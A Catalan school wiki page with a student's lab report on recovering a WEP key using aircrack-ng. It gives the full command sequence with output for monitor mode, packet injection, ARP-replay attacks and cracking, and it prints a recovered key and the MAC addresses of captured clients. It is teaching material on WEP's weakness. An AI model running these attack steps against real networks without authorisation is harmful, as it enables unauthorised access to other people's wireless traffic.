Usuari:Salegre/Instal.lació i manteniment de serveis d'Internet/Pràctica d'obtenció de claus webs

De IES Nicolau Copernic

Share/Save/Bookmark
< Usuari:Salegre | Instal.lació i manteniment de serveis d'Internet
Dreceres ràpides: navegació, cerca

Comentari del professor
Són claus WEP i no pas WEB


Contingut

Pràctica d'obtenció de weps mitjançant Imatge:Salegrelogo.png

Aircrack-ng és un programa de sniffers de claus 802.11 WEP i WPA/WPA2-PSK.

Aircrack-ng pot recuperar la clau WEP una vegada que s'han capturat suficients paquets xifrats amb airodump-ng. Aquest programa de la suite aircrack-ng porta a terme diversos tipus d'atacs per a descobrir la clau WEP amb petites quantitats de paquets capturats, combinant atacs estadístics amb atacs de força bruta.


Objectiu

L'objectiu d'aquesta pràctica és comprovar la debilitat de les xarxes xifrades amb clau WEP. Existeixen múltiples eines que permeten obtenir la clau WEP d'una xarxa privada sense gaires complicacions.


Qüestió

Una xarxa amb un sistema de xifratge de clau compartida (totes les màquines de la xarxa utilitzen la mateixa clau) és completament segura? Imagineu que la clau no és WEP (és segura i no es pot obtenir). Expliqueu el perquè de la vostra resposta.


Completament segura no és, perquè al ser compartida la clau, tot lo que enviem des de la nostra antena tothom ho pot xifrar.


Procediment

Instal·lació

1. Abans de instal.lat aircrack-ng hem de tenir instal·lat el paquet madwifi-tools. 
sudo apt-get install madwifi-tools


2. Ara procedim a instal·lar l'aircrack -ng. 
$ sudo apt-get install aircrack-ng
3. Comprovem que s'han instal·lat tots els paquets. 
$ dpkg -L aircrack-ng | grep bin

/usr/bin
/usr/bin/aircrack-ng
/usr/bin/airdecap-ng
/usr/bin/packetforge-ng
/usr/bin/ivstools
/usr/bin/kstats
/usr/bin/buddy-ng
/usr/bin/makeivs-ng
/usr/bin/airolib-ng
/usr/sbin
/usr/sbin/aireplay-ng
/usr/sbin/airodump-ng
/usr/sbin/airserv-ng
/usr/sbin/airtun-ng
/usr/sbin/wesside-ng
/usr/sbin/easside-ng
/usr/sbin/airmon-ng
/usr/sbin/airdriver-ng

Configuració

Aquí, tenim que configurar la targeta de xarxa en mode monitor, per fer això, seguim les següents passes:

1. Ara tenim que eliminar el VAP (Virtual Acces Point) de la ath0. 
$ sudo airmon-ng stop ath0
Interface	Chipset		Driver 

wifi0		Atheros		madwifi-ng
ath0		Atheros		madwifi-ng  VAP(parent: wifi0) (VAP destroyed)
2. I iniciem el mode monitor. 
$ sudo airmon-ng start wifi0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ngError for wireless request "Set Frequency" (8B04) :
    SET failed on device ath0 ; No such device.
ath0: ERROR while getting interface flags: No such device

ath1            Atheros         madwifi-ng VAP (parent: wifi0)
Però surt un error, on ens diu que la interfície ath0 passa a ser ath1. 
$ sudo airmon-ng start wifi0
Interface	Chipset		Driver

wifi0		Atheros		madwifi-ng
ath1           Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)
3. Comprovem que la targeta esta en mode monitor. 
$ sudo iwconfig ath1
ath1      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Frequency:2.457 GHz  Access Point: Not-Associated   
          Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=1/1  
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/70  Signal level=-95 dBm  Noise level=-95 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
4. Iniciem la interfície, fent un: 
$ sudo ifconfig ath1 up


5. Comprovem el funcionament de la injecció de paquets executa'n-se: 
$ sudo aireplay-ng --test -i wifi0 ath1
21:18:02  Trying broadcast probe requests...
21:18:04  No Answer...
21:18:04  Found 0 APs   


21:18:04  Trying card-to-card injection...
21:18:04  Attack -0:        OK
21:18:04  Attack -1 (open): OK
21:18:04  Attack -1 (psk):  OK
21:18:04  Attack -2/-3/-4:  OK
21:18:04  Attack -5:        OK
21:18:04  Injection is working!

Començament de l'atac

1. Creen una carpeta amb el nom atacWEP i ens col.loquem dintre: 
$ cd
$ mkdir atacWEP
$ cd atacWEP
2. Arribat en aquest punt em de buscar les víctimes amb airodump o Kismet on seguidament, ens apareixeran les xarxes de la zona. 
$ sudo airodump-ng -i ath1 -c 6 -w imatge_fitxer
CH  6 ][ Elapsed: 5 mins ][ 2008-11-18 21:31                                         
                                                                                                                             
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                                             
00:1D:73:3A:CB:AC   38  97     2614    97620  289   6  48  WPA  WEP    OPN  dd-wrtHotSpot                                  
00:80:5A:27:38:9B   32  31      897       50    0   6  54  OPN              WLAN_206                                       
00:15:E9:F2:81:91    2  42     1098       43    0   6  54  OPN              coperWifi                                      
                                                                                                                             
BSSID              STATION            PWR   Rate  Lost  Packets  Probes                                                     
                                                                                                                             
00:1D:73:3A:CB:AC  00:1C:F0:D4:53:FC   42  18- 1    12     3444                                                             
00:1D:73:3A:CB:AC  00:1C:F0:D4:59:3E   46   1- 1     0    43502                                                             
00:1D:73:3A:CB:AC  00:1C:F0:D4:55:46   42   0- 1     0    96548                                                             
00:1D:73:3A:CB:AC  00:1C:F0:D4:55:1B   41   1- 1     0    25516                                                             
00:1D:73:3A:CB:AC  00:1C:F0:D4:53:A9   -1   1- 0     0        5                                                             
(not associated)   00:19:5B:78:CE:0D   50   0- 1     0        2                                                             
(not associated)   00:1C:F0:D4:54:A8   48   0- 1     0       16                                                             
(not associated)   00:1E:4C:A7:8C:30   37   0- 1     0        5                                                             
(not associated)   00:80:5A:38:B1:69   32   0- 1     0       19                                                             
(not associated)   00:04:23:84:6F:29    4   0- 1     0        3
3. Com més temps deixem executant-se l'antiga comanda, més claus WEP obtindrem a traves del tràfic. Però si no existeix tràfic WEP el podem crear, seguin les següent instruccions:
3.1. ATENCIÓ: Hem de posar el BSSID (paràmetre -e) i MAC del punt d'accès (paràmetre -a) corresponent a la nostra xarxa. 
~/atacWEP$ sudo aireplay-ng -1 0 -e dd-wrt -a  00:1D:73:3A:CB:AC ath1
No source MAC (-h) specified. Using the device MAC (00:1C:F0:D4:55:1B)
21:22:51  Waiting for beacon frame (BSSID: 00:1D:73:3A:CB:AC)
For the given BSSID "00:1D:73:3A:CB:AC", there is an ESSID mismatch!
Found ESSID "dd-wrtHotSpot" vs. specified ESSID "dd-wrt"
Using the given one, double check it to be sure its correct!


21:22:51  Sending Authentication Request
21:22:51  Authentication successful
21:22:51  Sending Association Request
21:22:51  Association successful :-)
3.2. IMPORTANT: hem de tenir en marxa en un altre canal sol el airodump perquè sinó en sortiran missatges com el següent: 
09:55:56  ath1 is on channel 7, but the AP uses channel 6
4. Ara iniciem l'atac amb aireplay-ng per tal de capturar paquets IVS. 
~/atacWEP$ sudo aireplay-ng -3 -e dd-wrtHotSpot -a  00:1D:73:3A:CB:AC -x 600 ath1
No source MAC (-h) specified. Using the device MAC (00:1C:F0:D4:55:1B)
21:28:01  Waiting for beacon frame (ESSID: dd-wrtHotSpot)
Found BSSID "00:1D:73:3A:CB:AC" to given ESSID "dd-wrtHotSpot".
Saving ARP requests in replay_arp-1118-212801.cap
You should also start airodump-ng to capture replies.
Read 167108 packets (got 92074 ARP requests and 0 ACKs), sent 98553 packets...(600 pps)
5. Una vegada tenim prous IVS, executem el aircrack-ng en una terminal nova, pero dins de la carpeta que em creat. 
~/atacWEP$ sudo aircrack-ng -x -0 *.cap *.ivs
Opening replay_arp-1118-212801.cap
Opening fitxer_captura-01.ivs
Opening fitxer_captura-02.ivs
Opening fitxer_captura-03.ivs
Opening fitxer_captura-04.ivs
Read 124620 packets.

   #  BSSID              ESSID                     Encryption

   1  00:1D:73:3A:CB:AC  dd-wrtHotSpot             WEP (124401 IVs)
   2  00:80:5A:27:38:9B  WLAN_206                  Unknown
   3  00:15:E9:F2:81:91  coperWifi                 Unknown


Index number of target network ? (indiquem a quina xarxa estem atacant) 1

Li donem a intro i ja ens sortirà la pantalla de aircrack amb la clau.



  • La opció -x evita un atac de força bruta als últims 2 bytes (el crack és més ràpid) i el -0 només es per fer-ho més bonic.
  • La clau WEP està en format hexadecimal, es a dir, és té que treure els dos punts per a que tingui validesa.Quedaria així:
    • 9ED5AF96CA927CB8BE076ADFA4


Esquema

→ Feu un gràfic on es representi l'entorn de xarxa. Identifiqueu el següents punts:

  • Punt d'accés atacat
  • Atacant
  • Clients del punt d'accés
  • Informació de la xarxa (adreces IP, rangs de xarxa, paràmetres WI-FI, etc.)


Imatge:Salegreesquemawifi.PNG

Obtingut de «http://www.iescopernic.com/mediawiki/index.php/Usuari:Salegre/Instal.laci%C3%B3_i_manteniment_de_serveis_d%27Internet/Pr%C3%A0ctica_d%27obtenci%C3%B3_de_claus_webs»
Altres pàgines